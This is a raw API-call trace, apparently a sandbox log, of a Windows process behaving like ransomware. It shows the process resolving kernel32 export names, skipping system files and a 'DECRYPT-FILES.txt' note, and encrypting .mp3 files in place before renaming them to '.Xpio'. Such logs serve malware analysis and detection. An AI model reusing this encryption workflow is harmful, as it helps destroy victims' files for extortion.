lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0085.933] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0085.933] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0085.933] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0085.933] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0085.933] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0085.933] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0085.933] lstrlenA (lpString="DEBUGBREAK") returned 10 [0085.933] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0085.933] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0085.933] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0085.933] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0085.933] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0085.933] lstrlenA (lpString="DECODEPOINTER") returned 13 [0085.933] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0085.933] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0085.933] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0085.933] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0085.934] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0085.934] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0085.934] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0085.934] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0085.934] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0085.934] lstrlenA (lpString="DELETEATOM") returned 10 [0085.934] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0085.934] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0085.934] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0085.934] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0085.934] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0085.934] lstrlenA (lpString="DELETEFIBER") returned 11 [0085.934] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0085.934] lstrlenA (lpString="DELETEFILEA") returned 11 [0085.934] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0085.934] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0085.934] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0085.934] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0085.934] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0085.934] lstrlenA (lpString="DELETEFILEW") returned 11 [0085.934] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0085.934] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0085.934] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0085.934] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0085.934] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0085.934] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0085.934] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0085.934] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0085.934] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0085.934] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0085.934] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0085.934] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0085.934] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0085.934] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0085.934] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0085.934] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0085.934] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0085.935] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0085.935] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0085.935] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0085.935] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0085.935] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0085.935] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0085.935] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0085.935] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0085.935] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0085.935] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0085.935] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0085.935] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0085.935] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0085.935] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0085.935] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0085.935] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0085.935] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0085.935] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0085.935] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0085.935] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0085.935] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0085.935] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0085.935] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0085.935] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0085.935] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0085.935] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0085.935] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0085.935] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0085.935] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0085.935] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0085.935] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0085.935] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0085.935] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0085.935] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0085.935] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0085.935] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0085.935] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0085.936] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0085.936] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0085.936] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0085.936] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0085.936] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0085.936] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0085.936] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0085.936] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0085.936] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0085.936] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0085.936] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0085.936] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0085.936] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0085.936] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0085.936] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\tETpDL N.mp3") returned 68 [0085.936] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\tETpDL N.mp3.Xpio") returned 73 [0085.936] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\tETpDL N.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\tetpdl n.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\tETpDL N.mp3.Xpio" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\tetpdl n.mp3.xpio"), dwFlags=0x0) returned 1 [0085.946] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.956] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.958] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.963] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4838c3d0, ftCreationTime.dwHighDateTime=0x1d4d36e, ftLastAccessTime.dwLowDateTime=0xbe691d10, ftLastAccessTime.dwHighDateTime=0x1d4d540, ftLastWriteTime.dwLowDateTime=0xbe691d10, ftLastWriteTime.dwHighDateTime=0x1d4d540, nFileSizeHigh=0x0, nFileSizeLow=0x38d5, dwReserved0=0x0, dwReserved1=0x0, cFileName="zU XAhD6n QtktGAoqJg.mp3", cAlternateFileName="ZUXAHD~1.MP3")) returned 1 [0085.963] lstrcmpiW (lpString1="zU XAhD6n QtktGAoqJg.mp3", lpString2="DECRYPT-FILES.txt") returned 1 [0085.963] lstrcmpiW (lpString1="zU XAhD6n QtktGAoqJg.mp3", lpString2="autorun.inf") returned 1 [0085.963] lstrcmpiW (lpString1="zU XAhD6n QtktGAoqJg.mp3", lpString2="boot.ini") returned 1 [0085.965] lstrcmpiW (lpString1="zU XAhD6n QtktGAoqJg.mp3", lpString2="desktop.ini") returned 1 [0085.965] lstrcmpiW (lpString1="zU XAhD6n QtktGAoqJg.mp3", lpString2="ntuser.dat") returned 1 [0085.965] lstrcmpiW (lpString1="zU XAhD6n QtktGAoqJg.mp3", lpString2="iconcache.db") returned 1 [0085.965] lstrcmpiW (lpString1="zU XAhD6n QtktGAoqJg.mp3", lpString2="bootsect.bak") returned 1 [0085.965] lstrcmpiW (lpString1="zU XAhD6n QtktGAoqJg.mp3", lpString2="ntuser.dat.log") returned 1 [0085.966] lstrcmpiW (lpString1="zU XAhD6n QtktGAoqJg.mp3", lpString2="thumbs.db") returned 1 [0085.966] lstrcmpiW (lpString1="zU XAhD6n QtktGAoqJg.mp3", lpString2="Bootfont.bin") returned 1 [0085.966] lstrlenW (lpString="zU XAhD6n QtktGAoqJg.mp3") returned 24 [0085.966] lstrcmpiW (lpString1="mp3", lpString2="lnk") returned 1 [0085.966] lstrcmpiW (lpString1="mp3", lpString2="exe") returned 1 [0085.966] lstrcmpiW (lpString1="mp3", lpString2="sys") returned -1 [0085.966] lstrcmpiW (lpString1="mp3", lpString2="dll") returned 1 [0085.966] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\") returned 56 [0085.966] lstrlenW (lpString="zU XAhD6n QtktGAoqJg.mp3") returned 24 [0085.966] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\" [0085.966] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\", lpString2="zU XAhD6n QtktGAoqJg.mp3" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\zU XAhD6n QtktGAoqJg.mp3") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\zU XAhD6n QtktGAoqJg.mp3" [0085.966] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.966] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\zU XAhD6n QtktGAoqJg.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\zu xahd6n qtktgaoqjg.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0085.967] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=14549) returned 1 [0085.967] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0085.967] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0085.967] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0085.967] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0085.967] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.967] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0085.968] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0085.968] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.968] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0085.969] CloseHandle (hObject=0x42c) returned 1 [0085.969] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.969] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0085.970] CloseHandle (hObject=0x0) returned 0 [0085.970] CloseHandle (hObject=0x428) returned 1 [0085.970] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.970] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.970] GetTickCount () returned 0x114df29 [0085.970] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.971] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0085.971] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0085.971] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.971] lstrlenA (lpString="kernel32.dll") returned 12 [0085.971] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0085.971] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0085.971] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0085.971] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0085.971] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0085.971] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0085.971] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0085.971] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0085.971] lstrlenA (lpString="ADDATOMA") returned 8 [0085.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0085.972] lstrlenA (lpString="ADDATOMW") returned 8 [0085.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0085.972] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0085.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0085.972] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0085.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0085.972] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0085.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0085.972] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0085.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0085.972] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0085.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0085.972] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0085.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0085.972] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0085.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0085.972] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0085.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0085.972] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0085.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0085.972] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0085.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0085.972] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0085.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0085.972] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0085.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0085.972] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0085.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0085.972] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0085.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0085.972] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0085.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0085.972] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0085.972] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0085.972] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0085.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0085.973] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0085.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0085.973] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0085.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0085.973] lstrlenA (lpString="BACKUPREAD") returned 10 [0085.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0085.973] lstrlenA (lpString="BACKUPSEEK") returned 10 [0085.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0085.973] lstrlenA (lpString="BACKUPWRITE") returned 11 [0085.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0085.973] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0085.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0085.973] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0085.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0085.973] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0085.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0085.973] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0085.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0085.973] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0085.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0085.973] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0085.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0085.973] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0085.973] 